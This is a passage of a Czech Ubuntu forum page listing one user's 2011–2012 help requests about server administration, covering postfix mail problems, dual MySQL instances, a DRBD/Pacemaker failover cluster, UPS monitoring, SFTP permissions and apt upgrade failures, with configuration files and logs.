remoted.debug=1

..jenže rozšířené logování v ossec.log nevidím a nový soubor s tímto debugem se také nevytvořil, takže nevím, kde tento debug hledat. Možná by pomohl reinstall služby, abych začal zase od znova (pač poprvé se to nějak rozeběhlo...alespoň psalo, že služba "is running..."). Logy z klientského stroje jsem sice na serveru i tak neviděl, ale dostat se do tohoto stavu znovu by mě posunulo dál...

za jakýkoliv nápad díky..

11
Obecná podpora / Refresh www stránky z CRONu [vyřešeno]
« kdy: 03 Srpna 2012, 08:42:16 »
Zdravím,

znáte někdo elegantnější způsob, jak refreshnout stránku?

1) standartně přes syntaxi "php skript.php" - tady je problém, že skript používá globální proměnné apache, které cron nezná, čili to by nešlo..jedině předělat skript, ale to není tak uplně ono

2) např využití "w3m" ...jednoduchý skript, který zavolá stránku "w3m http://seznam.cz", vyčká 20 vteřin (kdyby náhodou trvalo načítání déle) a killne pidof programu w3m ..funguje, ale nezdá se mi to dostatečně dobré..

díky za případné návrhy

12
Ubuntu Server / Pošta a blacklist [vyřešeno]
« kdy: 22 Července 2012, 10:19:38 »
Zdravím,

v poště nejsem nějak extra zběhlý a potřeboval bych poradit, proč po nějaké době se dostanu na blacklist serveru CBL. Cca po 3 dnech fungování se dostanu na blacklist a musím vždy provést "delist". Je mi jasné, že to má nějaké opodstatnění, ale nevím, co dělám špatně..

Server běží na Ubuntu 10.04 LTS, používám postfix, jehož konfigurace je:

Citace
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no

# appending .domain is the MUA's job.
append_dot_mydomain = no

# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h

readme_directory = no

# TLS parameters
smtpd_tls_cert_file = /etc/postfix/ssl/smtpd.crt
smtpd_tls_key_file = /etc/postfix/ssl/smtpd.key
smtpd_use_tls = yes
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache

# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.

myhostname = priaproda
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = priaproda.cz, priaproda, localhost.localdomain, localhost, pria, pria.cz
#mydestination = priaproda.cz, priaproda, localhost.cz, localhost
unknown_local_recipient_reject_code = 550
disable_dns_lookups = no
debug_peer_level = 2
#relayhost =
relayhost =
#mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mynetworks = 127.0.0.0/8
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all
inet_protocols = ipv4
smtpd_sasl_local_domain =
smtpd_sasl_auth_enable = yes
smtpd_sasl_security_options = noanonymous
broken_sasl_auth_clients = yes
smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination
smtpd_tls_auth_only = no
smtp_use_tls = yes
smtp_tls_note_starttls_offer = yes
smtpd_tls_CAfile = /etc/postfix/ssl/cacert.pem
smtpd_tls_loglevel = 1
smtpd_tls_received_header = yes
smtpd_tls_session_cache_timeout = 3600s
tls_random_source = dev:/dev/urandom
home_mailbox = Maildir/
mailbox_command =
masquerade_exceptions = root
masquerade_classes = envelope_sender, header_sender, header_recipient
masquerade_domains =

Tuto konfiguraci jsem našel někde na netu. Jinak jedná se o doménu "pria.cz" a dívám se na blacklisty zde:

http://multirbl.valli.org/lookup/212.111.5.94.html

Nelíbí se mi už hláška nahoře: IP Addresses for gw-priasystems.cz   No record found!   Failed

Tak jestli tohle nemůže být problém..

Ono to normálně fungovalo, ale změnil se tam router a od té doby to blbne...ale už si nevybavuji, jestli s tím starým routerem tam ta hláška "No record found" byla nebo ne..

díky za případné rady..

13
Zdravím,

chtěl jsem vyzkoušet podporu FastCGI, podařilo se mi ji úspěšně nainstalovat dle postupu:
http://failover.co.za/2012/01/29/setup-apache-mpm-worker-fastcgi-php-fpm-apc/

Nyní funkce phpinfo() vrací správně: Server API    FPM/FastCGI

Problém ale vzniknul jinde...Příklad:

/projekty1/.htaccess
/projekty2/.htaccess
/projekty3/.htaccess

(+ další adresářová struktura dle názvu projektů...tento .htaccess je tedy společný pro všechny podsložky v dané složce "projekty" )

Mám řekněme tyto 3 složky, kde v každém z nich jsou definované globální proměnné pro connect do databáze..pro projekt1 je to např:

SetEnv PROJECT1_DBUSER user
SetEnv PROJECT1_DBPASSWORD password

V projektu pak můžu použít tuto globální proměnnou na jakoukoliv podsložku...

Po instalaci FPM dle návodu mi toto chování zmizelo..teď už to tyto proměnné nezná. Musel bych to do každého projektu dopsat ručně, což ztrácí význam..Uměl by někdo poradit, jak tomu pomoct, abych měl FastCGI a chování se vrátilo do normálu?

díky

14
Ubuntu Server / MYSQL - multiple
« kdy: 20 Května 2012, 10:51:36 »
Zdravím,

nějaký ten den se snažím rozběhnout dvě instance databáze mysql, ale pořád se to cosi nedaří...našel by se někdo, kdo to již rozběhnul?

Postupoval jsem dle tohoto návodu:
http://ubuntuforums.org/archive/index.php/t-1154296.html

Při startu mysql to píše tuto chybu:

Citace
120520 10:07:50 [Note] Plugin 'FEDERATED' is disabled.
/usr/sbin/mysqld: Table 'mysql.plugin' doesn't exist
120520 10:07:50 [ERROR] Can't open the mysql.plugin table. Please run mysql_upgrade to create it.
120520 10:07:50 InnoDB: The InnoDB memory heap is disabled
120520 10:07:50 InnoDB: Mutexes and rw_locks use GCC atomic builtins
120520 10:07:50 InnoDB: Compressed tables use zlib 1.2.3.4
120520 10:07:50 InnoDB: Initializing buffer pool, size = 128.0M
120520 10:07:50 InnoDB: Completed initialization of buffer pool
120520 10:07:50  InnoDB: Operating system error number 13 in a file operation.
InnoDB: The error means mysqld does not have the access rights to
InnoDB: the directory.
InnoDB: File name ./ibdata1
InnoDB: File operation call: 'create'.
InnoDB: Cannot continue operation.

..mám to víceméně stejně, jen v my.cnf jsem použil uživatele "mysql", on tam má "root". Ikdyž, zkoušel jsem i roota, ale ta samá chyba. Po chvilce googlení to vypadalo i na problém v apparmor, ale v tom samém návodu níže je napsáno, co tam vložit...celý soubor /etc/apparmor.d/usr.sbin.mysqld vypadá takto:

Citace
# vim:syntax=apparmor
# Last Modified: Tue Jun 19 17:37:30 2007
#include <tunables/global>

/usr/sbin/mysqld {
  #include <abstractions/base>
  #include <abstractions/nameservice>
  #include <abstractions/user-tmp>
  #include <abstractions/mysql>
  #include <abstractions/winbind>

  capability dac_override,
  capability sys_resource,
  capability setgid,
  capability setuid,

  network tcp,

  /etc/hosts.allow r,
  /etc/hosts.deny r,

  /etc/mysql/*.pem r,
  /etc/mysql/conf.d/ r,
  /etc/mysql/conf.d/* r,
  /etc/mysql/*.cnf r,
  /usr/lib/mysql/plugin/ r,
  /usr/lib/mysql/plugin/*.so* mr,
  /usr/sbin/mysqld mr,
  /usr/share/mysql/** r,
  /var/log/mysql.log rw,
  /var/log/mysql.err rw,
  /var/lib/mysql/ r,
  /var/lib/mysql/** rwk,
  /var/log/mysql/ r,
  /var/log/mysql/* rw,
  /var/run/mysqld/mysqld.pid w,
  /var/run/mysqld/mysqld.sock w,
  /run/mysqld/mysqld.pid w,
  /run/mysqld/mysqld.sock w,
  /var/lib/mysql2/ r,
  /var/lib/mysql2/** rwk,
  /var/run/mysqld/mysqld2.pid w,
  /var/run/mysqld/mysqld2.sock w,
  # Site-specific additions and overrides. See local/README for details.
  #include <local/usr.sbin.mysqld>


Jedna instance se nachází ve /var/lib/mysql, druhá instance /var/lib/mysql2 (on tam má /var/lib/mysql1 a mysql2, ale to je fuk)


Start mysql nevypíše vůbec nic:

Kód: [Vybrat]
root@domatest:/var/log/mysql# /etc/init.d/mysql start
root@domatest:/var/log/mysql#

Ale dle init skriptu ani nic nevypíše:

Citace
basedir=/usr
bindir=/usr/bin

if test -x $bindir/mysqld_multi
then
  mysqld_multi="$bindir/mysqld_multi";
else
  echo "Can't execute $bindir/mysqld_multi from dir $basedir";
  exit;
fi

case "$1" in
    'start' )
        "$mysqld_multi" start $2
        ;;
    'stop' )
        "$mysqld_multi" stop $2
        ;;
    'report' )
        "$mysqld_multi" report $2
        ;;
    'restart' )
        "$mysqld_multi" stop $2
        "$mysqld_multi" start $2
        ;;
    *)
        echo "Usage: $0 {start|stop|report|restart}" >&2
        ;;
esac

Jinak mám Ubuntu 12.04 server, 32bit

díky

15
Ubuntu Server / apcupsd - více UPS na jednom PC
« kdy: 31 Března 2012, 11:03:28 »
Zdravím,

chci se zeptat, jestli někdo nemá zkušenosti s monitoringem více UPS na jednom PC. Našel jsem jen to, že je třeba mít vše 2x. Startovací skripty, konfiguraci atd... o což se snažím, ale zaprvé nevím, proč mi startuje druhá instance na stejném portu, jako instance první (v konfiguráku mám tento port a cestu k tomuto konfiguráku mám samozřejmě změněnou), vše bych měl mít 2x ...jediné, co jsem neměnil je soubor /sbin/apcupsd, pač je to binárka...a nevím, jestli v této binárce není nějak pevně nastaveno, aby lezl do konfiguráku původního..ale to snad ne, pač tato cesta lze měnit v hlavním konf souboru.

Ale ikdyby se mi tohle podařilo rozběhat na druhém portu, tak mi ještě není jasné, jak by měl poznat, které USB je pro jakou UPS...ono se to totiž neptá, ke kterému USB je zařízení připojeno...čili jediné, co mě napadá je to, že jedna UPS bude přes USB, druhá přes serial...osobně by se mi ale líbilo mít obě přes usb...

byly by nějaké nápady?

Děkuji

16
Ubuntu Server / Postfix - Unroutable email address [vyřešeno]
« kdy: 16 Února 2012, 20:30:36 »
Zdravím,

no, pomalu to začínám vzdávat a rád bych požádal o pomoc..


Konfigurák postfix:

Citace
# See /usr/share/postfix/main.cf.dist for a commented, more complete version


# Debian specific:  Specifying a file name will cause the first
# line of that file to be used as the name.  The Debian default
# is /etc/mailname.
#myorigin = /etc/mailname

smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
biff = no

# appending .domain is the MUA's job.
append_dot_mydomain = no

# Uncomment the next line to generate "delayed mail" warnings
#delay_warning_time = 4h

readme_directory = no

# TLS parameters
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_use_tls=yes
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache

# See /usr/share/doc/postfix/TLS_README.gz in the postfix-doc package for
# information on enabling SSL in the smtp client.

myhostname = test.test.cz
#myhostname = test
alias_maps = hash:/etc/aliases
alias_database = hash:/etc/aliases
myorigin = /etc/mailname
mydestination = test.cz, test.test.cz, localhost.test.cz, localhost
#mydestination = test.cz, test, localhost.localdomain.cz, localhost
#relayhost = smtp.inext.cz
relayhost =
mynetworks = 127.0.0.0/8 [::ffff:127.0.0.0]/104 [::1]/128
mailbox_size_limit = 0
recipient_delimiter = +
inet_interfaces = all

/etc/hosts

Citace
127.0.0.1   localhost
xxx.xxx.xxx.xxx   test.test.cz    test (kde xxx je veřejná IP)

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Log postfixu při zaslání emailu např na seznam říká:

Citace
Feb 16 19:47:11 test postfix/smtp[16503]: 08CE7229B8: to=<mujmail@seznam.cz>, relay=mx50.seznam.cz[77.75.77.47]:25, delay=2.2, delays=0.11/0.01/2.1/0.04, dsn=5.4.4, status=bounced (host mx50.seznam.cz[77.75.77.47] said: 550 5.4.4 Unroutable email address. (in reply to MAIL FROM command))
Feb 16 19:47:11 test postfix/cleanup[16501]: 44B2C22C04: message-id=<20120216184711.44B2C22C04@test.test.cz>
Feb 16 19:47:11 test postfix/qmgr[16034]: 44B2C22C04: from=<>, size=2329, nrcpt=1 (queue active)
Feb 16 19:47:11 test postfix/bounce[16504]: 08CE7229B8: sender non-delivery notification: 44B2C22C04
Feb 16 19:47:11 test postfix/qmgr[16034]: 08CE7229B8: removed
Feb 16 19:47:11 test postfix/local[16505]: 44B2C22C04: to=<ladik@test.cz>, relay=local, delay=0.14, delays=0.06/0.01/0/0.07, dsn=2.0.0, status=sent (delivered to mailbox)
Feb 16 19:47:11 test postfix/qmgr[16034]: 44B2C22C04: removed

Na Gmail i centrum maily chodí..na seznam a několik dalších ne...Je to problém, který se na netu evidentně řeší. Našel jsem X stránek, ale žádná nevedla k úspěchu...např na abclinuxu je přesně můj problém, ale skončil nevyřešen.. Z jiných strojů v této síti normálně maily chodí, čili problém musí být někde v nastavení mého serveru.. Jedná se o Ubuntu 10.04 LTS, maily posílám na test z příkazové řádky přes "mail" nebo "mutt" ...ale v zásadě je to webový server, takže hlavně bude využíván přes apache...

syntaxe:

Kód: [Vybrat]
echo "test" | mail -s predmet mujmail@seznam.cznebo
Kód: [Vybrat]
echo "test" | mutt -s predmet mujmail@seznam.cz
...na seznam ne a ne to přijít...V zásadě se všude radí něco o MX záznamu, A záznamu, reverzní DNS ...reverzní DNS jsem si u providera nastavil, dle testu bych ho již měl mít ok...říká ale, že se neshodují všechny MX záznamy...co to znamená? Kde si mám MX záznam nastavit a s čím se má shodovat??

Dělal jsem různé kombinace v /etc/hosts, na postfix jsem si rozjel SASL zabezpečení, vyzkoušel relayhost ...tohle je zajímavé, že pokud dám relayhost mého providera, chyby v logu zmizí ...najednou všechny odeslané emaily jsou v pořádku ...dle logu ...ale mail mi nikdy nedorazil. Netuším, kde skončil...

Tahle "chyba" je dost frekventovaná a nenašel jsem SOLVED řešení...Mohl by mi někdo poradit, co kde udělat a jednou provždy tento problém označit za vyřešený?

děkuji

17
Ubuntu Server / SFTP - symbolic links
« kdy: 26 Ledna 2012, 11:23:42 »
Zdravím,

je nějaký způsob, jak donutit sftp, aby bralo vpotaz symbolické linky?

složka: /media/data/test
chroot sftp účtu: /media/data/sftp/user

udělám: "ln -s /media/data/test /media/data/sftp/user"

přes ssh je to ok, přes sftp to není ok - nefunguje. Nejspíš je to tím, že uživatel "user" je uzamčen ve složce "/media/data/sftp" a tudíž nezná zdrojovou složku /media/data/test. Jde nějakým způsobem konfigurovat sshd_config (nebo jiný způsob?), přidáním optionu "follow_symlinks" nebo tak něco, aby tyto symlinky fungovaly?

18
Ubuntu Server / Kopírování a práva - [znovu otevřeno]
« kdy: 16 Ledna 2012, 22:20:31 »
Zdravím,

na to, jak dlouho s ubuntu dělám asi trapný dotaz, nicméně bych potřeboval nějaké lepší řešení, než jaké používám a prozatím se mi nic nepodařilo vygooglit..našel jsem něco o sticky bitu, možná mi pomůže právě on, nicméně podělit se můžu, třeba to někdo bude řešit taky..

Mám vytvořené sftp uživatele, každý z nich je přiřazen do skupiny "users", tato skupina je na nějaké mnou zadané složce:

drwxrwxr-x 3 www-data users    4096 2012-01-16 20:49 www/

1) není mi jasné, proč do ní nemůže zapisovat uživatel, který JE součástí skupiny "users" - pomůže jedině oprávnění 777
2) ikdyž použiju oprávnění 777 a všichni uživatelé tedy budou moct zapisovat, tak hlavním problémem je to, když tam někdo nakopíruje jakýkoliv soubor, potřebuji, aby ho ostatní mohli editovat ...což nejde, pač soubor má vlastníka i skupinu stejnou - dle toho, kdo tam ten soubor nahrál ...

Potřeboval bych, aby ten, kdo bude do této složky soubory vkládat, aby se automaticky přiřazovala skupina users ...tzn

místo:
drwxrwxr-x 3 pepa pepa    4096 2012-01-16 20:49 file.txt

aby bylo:
drwxrwxr-x 3 pepa users    4096 2012-01-16 20:49 file.txt


...dá se někde nastavit, aby se zapisovala data s mnou nadefinovanou skupinou?


Doteď jsem to řešil tak, že cron upravoval oprávnění ...to je ale na prd


díky


EDIT: Tak našel jsem SGID bit, tento nastaví přesně to, co jsem chtěl ...takže prozatím nejspíš vyřešeno. Kdyby se někdo podělil o své zkušenosti s tímto sdílením, byl bych každopádně rád..

19
Ubuntu Server / UPS a korektní vypnutí PC
« kdy: 14 Prosince 2011, 09:12:41 »
Zdravím,

zeptám se možná hloupě, pač o tomhle problému nemám dostatek informací, nicméně:

1) rozpozná server (nebo klasické PC - systém Ubuntu server/desktop), že je napájeno z UPS a po dosažení kritické napěťové hranice se korektně vypne? = povypíná všechny služby a dojde ke korektnímu vypnutí, jako bych mu to zadal např příkazem "shutdown" (čili stejný princip jako u notebooků)? Nebo při dosažení této kritické hranice jednoduše "padne", jako bych vytáhnul napájecí kabel ze zásuvky..?

2) věděl by někdo, kam se zapisují informace o stavu tohoto akumulátoru? Čili abych si sám mohl napsat, který skript se má spustit, až poklesne hranice vybití např na 20% ...?

EDIT: Aha, konečně se mi podařilo sesmolit ten správný dotaz do googlu, abych dostal výsledek :) Odpověď by mohla být tady:
http://www.abclinuxu.cz/blog/FluxBlog/2008/1/nut-network-ups-tools-trochu-tvrdsi-orisek

Nicméně vlastní zkušenosti by mě zajímaly také...

díky

20
Ubuntu Server / DRBD + HA + Cluster + CRM [vyřešeno]
« kdy: 23 Listopadu 2011, 11:00:13 »
Zdravím,

přes X nějakých návodů jsem se prokousal téměř až k cíli..chybí mi už jen poslední věc.

Situace:

- mám rozběhlý cluster
- mám rozběhlé DRBD


téměř vše funguje v podstatě korektně ..mám dva stroje, po restartu obou se to dostane do "default" stavu, kdy na primární stroj je nasměrovaná virtuální IP a je automaticky namountován oddíl, který je definován v DRBD a je tedy sdílen se strojem č.2...

Jakmile dojde k výpadku primárního stroje, virtuální IP se nasměruje na stroj č.2, ale nedojde automaticky k mountu sdíleného DRBD oddílu. A jen tuto prkotinu se mi nedaří nějak rozběhat ...resp poradil bych si nějakým svým skriptem, který by to ocheckoval a mountnul, ale to je hodně velký nesmysl, když už na to udělátka jsou :) ...jen se mi nedaří přijít na tu správnou syntaxi do konfigurace crm ..

Tohle je korektní výpis status z CRM

Kód: [Vybrat]
crm(live)# status
============
Last updated: Wed Nov 23 10:43:25 2011
Stack: openais
Current DC: node1 - partition with quorum
Version: 1.0.8-042548a451fce8400660f6031f4da6f0223dd5dd
2 Nodes configured, 2 expected votes
3 Resources configured.
============

Online: [ node1 node2 ]

 failover-ip (ocf::heartbeat:IPaddr2): Started node2
 Master/Slave Set: DRBDClone
     Masters: [ node2 ]
     Slaves: [ node1 ]
 fs0 (ocf::heartbeat:Filesystem): Started node2


Výpis z drbd

Kód: [Vybrat]
root@node1:~/cluster# cat /proc/drbd
version: 8.3.7 (api:88/proto:86-91)
GIT-hash: ea9e28dbff98e331a62bcbcc63a6135808fe2917 build by root@node1, 2011-11-21 22:54:29
 0: cs:Connected ro:Secondary/Primary ds:UpToDate/UpToDate C r----
    ns:0 nr:12459020 dw:12459020 dr:0 al:0 bm:764 lo:0 pe:0 ua:0 ap:0 ep:1 wo:b oos:0

...tady vidím trochu problém v tom Secondary/Primary ...jen ten stroj, který je primární se může mountnout ...umím ho dát do stavu Primary/Primary ..ale byl bych radši, aby nebyly mountnuté oba disky najednou ...chtěl bych, aby se na druhý stroj mountnul až v případě, kdy první vypadne..


A konfigurace CRM

Kód: [Vybrat]
node node1
node node2
primitive DRBD ocf:linbit:drbd \
params drbd_resource="r0" \
op monitor interval="60s"
primitive failover-ip ocf:heartbeat:IPaddr2 \
params ip="192.168.2.50" cidr_netmask="24" \
op monitor interval="30s"
primitive fs0 ocf:heartbeat:Filesystem \
params device="/dev/drbd0" directory="/media/Data" fstype="ext4"
ms DRBDClone DRBD \
meta master-max="1" master-node-max="1" clone-max="2" clone-node-max="1" notify="true"
location cli-prefer-failover-ip failover-ip \
rule $id="cli-prefer-rule-failover-ip" inf: #uname eq node2
colocation fs0-on-DRBDClone inf: fs0 DRBDClone:Master
order DRBDClone-before-fs0 inf: DRBDClone:promote fs0:start
property $id="cib-bootstrap-options" \
dc-version="1.0.8-042548a451fce8400660f6031f4da6f0223dd5dd" \
cluster-infrastructure="openais" \
expected-quorum-votes="2" \
no-quorum-policy="ignore" \
stonith-enabled="false"
rsc_defaults $id="rsc-options" \
resource-stickiness="100"


...hodnoty možná nebudou úplně košér (jedna se jen o dva nody), ale jsem rád, že se mi to po týdnu bádání podařilo vůbec rozběhnout, tak přivítám i případné rady na změny...

díky

21
Instalace, aktualizace a spouštění / Rozpor ve verzích distribuce?
« kdy: 17 Listopadu 2011, 14:19:44 »
Zdravím,

zrovna řeším u kamaráda takový problém, že systém se hlásí jako Natty
System > Správa > Sledování Systému ............. (Natty)

ale ve výpisu ll /boot jsou jádra z 10.10 (vmlinuz-2.6.35-x-generic-pae)...Natty má tuším 2.6.38.x ..

Otázka zní ...pokud došlo k povýšení, kde je nové jádro?

Pokud dám sources.list z Mavericku a udělám update, i upgrade, vše proběhne ok ...jen při povýšení to vypíše error ..povyšovat to chce na 11.10, takže systém si myslí, že je opravdu 11.04 ..

Pokud dám ale sources.list z Natty, udělám také update, provede se bez výpisu errorů, ale u upgrade to vypíše hodně balíků k instalaci, ale do instalace mě to nepustí:

Kód: [Vybrat]
root@doma:/etc/apt# apt-get upgrade
Čtu seznamy balíků… Hotovo
Vytvářím strom závislostí       
Čtu stavové informace… Hotovo
Následující balíky jsou podrženy v aktuální verzi:
  apport-gtk aptdaemon apturl apturl-common ark avidemux-plugins-common bind9-host binfmt-support brasero brasero-cdrkit brltty brltty-x11 capplets-data
  chromium-browser chromium-browser-l10n compiz compiz-core compiz-fusion-plugins-main compiz-gnome compiz-plugins computer-janitor computer-janitor-gtk
  console-setup couchdb-bin cpp cpu-checker cups desktopcouch dhcp3-client dhcp3-common dnsutils dvd+rw-tools eclipse-jdt eclipse-pde eclipse-platform
  eclipse-plugin-cvs eclipse-rcp empathy empathy-common evolution evolution-common evolution-couchdb evolution-data-server evolution-data-server-common
  evolution-exchange evolution-indicator evolution-plugins evolution-webcal exiv2 ffmpeg gbrainy gcc gdm ghostscript ghostscript-x gimp gimp-data gnome-applets
  gnome-applets-data gnome-bluetooth gnome-codec-install gnome-control-center gnome-disk-utility gnome-media gnome-media-common gnome-panel gnome-panel-data
  gnome-power-manager gnome-settings-daemon gnome-user-guide gparted gstreamer0.10-alsa gstreamer0.10-nice gstreamer0.10-plugins-bad
  gstreamer0.10-plugins-bad-multiverse gstreamer0.10-plugins-base gstreamer0.10-plugins-base-apps gstreamer0.10-plugins-good
  gstreamer0.10-plugins-ugly-multiverse gstreamer0.10-pulseaudio gstreamer0.10-tools gstreamer0.10-x gtk2-engines-pixbuf gvfs gvfs-backends gvfs-fuse hpijs
  hplip hplip-data indicator-applet indicator-applet-session indicator-application indicator-me indicator-messages indicator-session indicator-sound iptables
  jockey-common jockey-gtk kdebase-runtime kdiff3 krename krusader ksnapshot language-selector language-selector-common libappindicator0.1-cil libappindicator1
  libavcodec-extra-52 libavdevice52 libavfilter1 libavformat-extra-52 libavutil-extra-50 libbind9-60 libbrasero-media1 libclutter-1.0-0 libclutter-gtk-0.10-0
  libcompizconfig0 libdb4.7-java-gcj libdmapsharing2 libebackend1.2-0 libegroupwise1.2-13 libequinox-osgi-java libevdocument3 libevolution libgail-common
  libgail18 libgcj-bc libgexiv2-0 libgimp2.0 libglade2.0-cil libgnome-media0 libgnome-window-settings1 libgpod-common libgpod4 libgstfarsight0.10-0
  libgstreamer-plugins-base0.10-0 libgstreamer0.10-0 libgtk2.0-0 libgtk2.0-bin libgtk2.0-cil libgtkhtml-editor-common libgtkhtml-editor0 libgtkhtml3.14-19
  libgtkmm-2.4-1c2a libhpmud0 libindicate-gtk2 libisccc60 liblaunchpad-integration1 liblaunchpad-integration1.0-cil liblwres60 libnm-glib2 libnm-util1
  libnotify-bin libnspr4-0d libnss3-1d libpam-modules libpanel-applet2-0 libpango1.0-0 libplymouth2 libpostproc-extra-51 librpmio1 libsane-hpaio
  libsoup-gnome2.4-1 libsoup2.4-1 libspectre1 libstreamanalyzer0 libstreams0 libswscale-extra-0 libsyncdaemon-1.0-1 libtotem-plparser17 libubuntuone-1.0-1
  libutouch-grail1 libva1 linux-generic-pae linux-headers-generic-pae linux-image-generic-pae man-db mencoder mousetweaks mplayer nautilus
  nautilus-sendto-empathy network-manager network-manager-gnome ntpdate nvidia-173 nvidia-common okteta openoffice.org-calc openoffice.org-common
  openoffice.org-draw openoffice.org-emailmerge openoffice.org-gnome openoffice.org-gtk openoffice.org-help-cs openoffice.org-help-en-gb
  openoffice.org-help-en-us openoffice.org-hyphenation-en-us openoffice.org-impress openoffice.org-l10n-cs openoffice.org-l10n-en-gb openoffice.org-l10n-en-za
  openoffice.org-math openoffice.org-thesaurus-cs openoffice.org-thesaurus-en-us openoffice.org-writer pdfmod pdftk pidgin-libnotify
  plasma-scriptengine-javascript plymouth plymouth-label policykit-1-gnome poppler-utils python python-appindicator python-apt python-aptdaemon
  python-aptdaemon-gtk python-beautifulsoup python-couchdb python-desktopcouch-records python-evolution python-farsight python-gconf python-glade2
  python-gnome2 python-gobject python-gobject-cairo python-gst0.10 python-gtask python-gtk2 python-gtkmozembed python-gtksourceview2 python-imaging
  python-indicate python-launchpadlib python-lazr.restfulclient python-lazr.uri python-mako python-markupsafe python-minimal python-openssl python-poppler
  python-pygoocanvas python-serial python-simplejson python-twisted-core python-twisted-names python-twisted-web python-twisted-words python-ubuntuone
  python-ubuntuone-client python-uno python-wadllib python-webkit rhythmbox rhythmbox-plugin-cdrecorder rhythmbox-plugins rhythmbox-ubuntuone-music-store
  sessioninstaller shotwell software-center software-properties-gtk telepathy-gabble telepathy-logger thunderbird tomboy totem totem-mozilla totem-plugins
  transmission-common transmission-gtk ubuntu-desktop ubuntu-sso-client ubuntuone-client ubuntuone-client-gnome udisks ufraw ufraw-batch ufw uno-libs3
  update-manager update-manager-core upower ure vino vlc vlc-nox vlc-plugin-notify vlc-plugin-pulse xorg xserver-xorg xserver-xorg-core
  xserver-xorg-input-evdev xserver-xorg-input-vmmouse xserver-xorg-input-wacom xserver-xorg-video-geode xserver-xorg-video-mga xserver-xorg-video-openchrome
  xserver-xorg-video-vmware yelp
0 aktualizováno, 0 nově instalováno, 0 k odstranění a 303 neaktualizováno.
root@doma:/etc/apt#


root@doma:/etc/apt# apt-get dist-upgrade
Čtu seznamy balíků… Hotovo
Vytvářím strom závislostí       
Čtu stavové informace… Hotovo
Propočítávám aktualizaci… Selhalo
Následující balíky mají nesplněné závislosti:
 dbus : Závisí na: upstart-job
        Závisí na: upstart (>= 0.6.3-6) ale nebude se instalovat
 hostname : Předzávisí na: upstart-job
 module-init-tools : Závisí na: upstart-job
 netbase : Závisí na: initscripts ale nebude se instalovat
           Závisí na: upstart-job
           Doporučuje: ifupdown
 procps : Závisí na: upstart-job
          Závisí na: initscripts ale nebude se instalovat
 ssh : Závisí na: openssh-server ale nebude se instalovat
 udev : Závisí na: upstart-job
 util-linux : Závisí na: upstart-job
 x11-common : Závisí na: upstart-job
 xserver-xorg-core : Závisí na: keyboard-configuration ale nebude se instalovat
E: Chyba, pkgProblemResolver::Resolve vytváří poruchy, to může být způsobeno podrženými balíky.
root@doma:/etc/apt#




nesplněné závislosti vidím a když vidím balíky, u kterých to píše, tak se mi do toho nechce zasahovat bez dobré rady :)...Když dám apt-get install na nějaký tento balík, tak mi to ale píše, že balík je v nejnovější verzi...byly by nápady?

Jinak situace je taková, že původní systém byl 10.10, pak nejspíš došlo k povýšení, ale tady bude asi ten problém a pak chtěl kamarád povýšit na 11.10 a to už nejde

22
Zdravím,

věděl by někdo jednodušší zápis pro komunikaci mezi shellem a mysql? Abych získal potřebná data, tak to zatím dělám takhle:

/**  SELECT id z databáze **/
mysql -uUSER -hHOST -pPASSWD -e "SELECT id FROM ...." > $FILE

/** odstranění prvního řádku, kde jsou názvy sloupců **/
sed "1 d" -i $FILE

while read line do;

  name= mysql -uUSER -hHOST -pPASSWD -e "SELECT name FROM table WHERE id=$line...." > $FILE
  event= mysql -uUSER -hHOST -pPASSWD -e "SELECT event FROM table WHERE id=$line ...." > $FILE
  notice= mysql -uUSER -hHOST -pPASSWD -e "SELECT notice FROM table WHERE id=$line ...." > $FILE

  echo "$name : $event : $notice"

done < $FILE

Syntaxe není úplně přesná, ale na ukázku to asi stačí ...prostě abych získal konkrétní sloupec, tak to musím dělat tak složitě, že ID zapisuju do souboru a z něj pak tahám co potřebuji ...funguje to tak jak by mělo, ale pokud to jde jednodušeji, byl bych rád...něco jak je v php Mysql_Fetch_Assoc, kde si pak proměnné budu tahat např: $result[name], $result[event] atd ...abych nemusel pro každý údaj dělat select..

23
Zdravím,

věděl by někdo, jestli se dá syslog propojit s logováním aplikací třetích stran? Příklad, vytvořím si program a chci, aby mi tento program logoval do syslogu dle nějakého formátu...

Např skript:

Kód: [Vybrat]
ping -c 2 www.centrum.cz

if [ $? -eq 0 ]; then
        date +%Y-%m-%d - JEDE
else
        date +%Y-%m-%d - NEJEDE
fi;

....a výstup, abych našel v syslogu..


K úplné dokonalosti bych to potřeboval propojit se syslog-ng, kde bych si nastavil výstupní cestu, kam to bude třídit...něco jako:

destination df_inet { file("/var/log/$YEAR/$MONTH/inet.log"); };

a v souboru inet.log budu mít tyto výstupy ...

Já vím, že to půjde přesměrováním (např: ./inet.sh >> /var/log.../inet.log), ale řekněme, že výše uvedený způsob je nějaké nařízení, které je nutno dodržet, nejde samozřejmě o tak triviální záležitost, kterou jsem uvedl v příkladu.. I "./inet.sh >> /var/log/syslog" nejspíš není úplně košér :)

V "man syslog" jsem nenašel nic (No manual entry for syslog) a na googlu zatím hledám...

děkuji

24
Multimédia / užití MPC [vyřešeno]
« kdy: 25 Července 2011, 09:34:06 »
